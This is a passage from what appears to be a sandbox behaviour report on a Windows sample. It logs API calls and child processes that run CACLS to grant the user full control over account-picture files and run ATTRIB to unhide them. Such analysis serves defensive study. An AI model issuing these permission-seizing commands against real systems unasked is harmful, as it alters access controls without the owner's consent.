lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x2eeaf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeaf0) returned 0x4de4d8 [0186.612] FindClose (in: hFindFile=0x4de4d8 | out: hFindFile=0x4de4d8) returned 1 [0186.612] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2eeaf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeaf0) returned 0xffffffff [0186.612] GetLastError () returned 0x2 [0186.612] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2eeaf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeaf0) returned 0x4de4d8 [0186.612] FindClose (in: hFindFile=0x4de4d8 | out: hFindFile=0x4de4d8) returned 1 [0186.612] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0186.612] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0186.612] GetConsoleTitleW (in: lpConsoleTitle=0x2eefe8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.613] InitializeProcThreadAttributeList (in: lpAttributeList=0x2eee70, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2eef38 | out: lpAttributeList=0x2eee70, lpSize=0x2eef38) returned 1 [0186.613] UpdateProcThreadAttribute (in: lpAttributeList=0x2eee70, dwFlags=0x0, Attribute=0x60001, lpValue=0x2eef30, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2eee70, lpPreviousValue=0x0) returned 1 [0186.613] GetStartupInfoW (in: lpStartupInfo=0x2eee2c | out: lpStartupInfo=0x2eee2c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0186.613] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0186.613] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2eeecc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2eef18 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp\"", lpProcessInformation=0x2eef18*(hProcess=0x4c, hThread=0x50, dwProcessId=0x408, dwThreadId=0xeb4)) returned 1 [0186.614] CloseHandle (hObject=0x50) returned 1 [0186.614] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0186.614] GetEnvironmentStringsW () returned 0x4e2410* [0186.614] FreeEnvironmentStringsW (penv=0x4e2410) returned 1 [0186.614] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0186.730] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2eee0c | out: lpExitCode=0x2eee0c*=0x0) returned 1 [0186.730] CloseHandle (hObject=0x4c) returned 1 [0186.730] _vsnwprintf (in: _Buffer=0x2eef54, _BufferCount=0x13, _Format="%08X", _ArgList=0x2eee18 | out: _Buffer="00000000") returned 8 [0186.730] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0186.730] GetEnvironmentStringsW () returned 0x4e2410* [0186.730] FreeEnvironmentStringsW (penv=0x4e2410) returned 1 [0186.730] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0186.730] GetEnvironmentStringsW () returned 0x4e2410* [0186.730] FreeEnvironmentStringsW (penv=0x4e2410) returned 1 [0186.730] DeleteProcThreadAttributeList (in: lpAttributeList=0x2eee70 | out: lpAttributeList=0x2eee70) [0186.730] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.731] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0186.731] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.731] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0186.731] _get_osfhandle (_FileHandle=0) returned 0x3 [0186.731] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0186.731] SetConsoleInputExeNameW () returned 0x1 [0186.731] GetConsoleOutputCP () returned 0x1b5 [0186.731] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0186.731] SetThreadUILanguage (LangId=0x0) returned 0x409 [0186.731] exit (_Code=0) Process: id = "386" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16c20" os_pid = "0xeb8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "385" os_parent_pid = "0x128" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26831 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26832 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26833 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26834 start_va = 0x210000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 26835 start_va = 0xa50000 end_va = 0xa58fff entry_point = 0xa50000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 26836 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26837 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26838 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26839 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 26840 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26841 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26842 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26843 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26844 start_va = 0x170000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 26845 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 26846 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26847 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26848 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26849 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26850 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26851 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26852 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 551 os_tid = 0xebc Thread: id = 552 os_tid = 0xe74 Process: id = "387" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16c20" os_pid = "0x408" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "385" os_parent_pid = "0x128" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26853 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26854 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26855 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26856 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 26857 start_va = 0xb00000 end_va = 0xb06fff entry_point = 0xb00000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 26858 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26859 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26860 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26861 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 26862 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26863 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26864 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26865 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26866 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 26867 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 26868 start_va = 0x6dea0000 end_va = 0x6debcfff entry_point = 0x6dea0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 26869 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26870 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26871 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26872 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26873 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26874 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26875 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26876 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26877 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26878 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26879 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26880 start_va = 0x290000 end_va = 0x357fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 26881 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26882 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 553 os_tid = 0xeb4 Process: id = "388" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d80" os_pid = "0xfac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26883 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26884 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26885 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26886 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 26887 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 26888 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26889 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26890 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26891 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 26892 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26893 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26894 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26895 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26896 start_va = 0x120000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 26897 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 26898 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 26899 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26900 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26901 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26902 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26903 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26904 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26905 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26906 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26907 start_va = 0x3b0000 end_va = 0x477fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 26908 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26909 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 26910 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 26911 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 26912 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 26913 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 26914 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 26915 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 26916 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Region: id = 26917 start_va = 0x1300000 end_va = 0x15cefff entry_point = 0x1300000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 554 os_tid = 0xd68 [0186.850] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22f7d4 | out: lpSystemTimeAsFileTime=0x22f7d4*(dwLowDateTime=0xa4478420, dwHighDateTime=0x1d440a9)) [0186.850] GetCurrentProcessId () returned 0xfac [0186.850] GetCurrentThreadId () returned 0xd68 [0186.850] GetTickCount () returned 0x355dc [0186.850] QueryPerformanceCounter (in: lpPerformanceCount=0x22f7cc | out: lpPerformanceCount=0x22f7cc*=24363966215) returned 1 [0186.851] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0186.851] __set_app_type (_Type=0x1) [0186.851] __p__fmode () returned 0x76b331f4 [0186.851] __p__commode () returned 0x76b331fc [0186.851] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0186.851] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0186.852] GetCurrentThreadId () returned 0xd68 [0186.852] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd68) returned 0x38 [0186.852] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0186.852] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0186.852] SetThreadUILanguage (LangId=0x0) returned 0x409 [0186.852] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0186.852] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22f764 | out: phkResult=0x22f764*=0x0) returned 0x2 [0186.852] VirtualQuery (in: lpAddress=0x22f79b, lpBuffer=0x22f734, dwLength=0x1c | out: lpBuffer=0x22f734*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0186.852] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22f734, dwLength=0x1c | out: lpBuffer=0x22f734*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0186.852] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22f734, dwLength=0x1c | out: lpBuffer=0x22f734*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0186.852] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22f734, dwLength=0x1c | out: lpBuffer=0x22f734*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0186.852] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22f734, dwLength=0x1c | out: lpBuffer=0x22f734*(BaseAddress=0x230000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x80000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0186.852] GetConsoleOutputCP () returned 0x1b5 [0186.852] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0186.852] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0186.852] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.852] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0186.853] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.853] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0186.853] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.853] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0186.853] _get_osfhandle (_FileHandle=0) returned 0x3 [0186.853] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0186.853] _get_osfhandle (_FileHandle=0) returned 0x3 [0186.853] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0186.853] GetEnvironmentStringsW () returned 0x2c0308* [0186.853] FreeEnvironmentStringsW (penv=0x2c0308) returned 1 [0186.854] GetEnvironmentStringsW () returned 0x2c0308* [0186.854] FreeEnvironmentStringsW (penv=0x2c0308) returned 1 [0186.854] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, 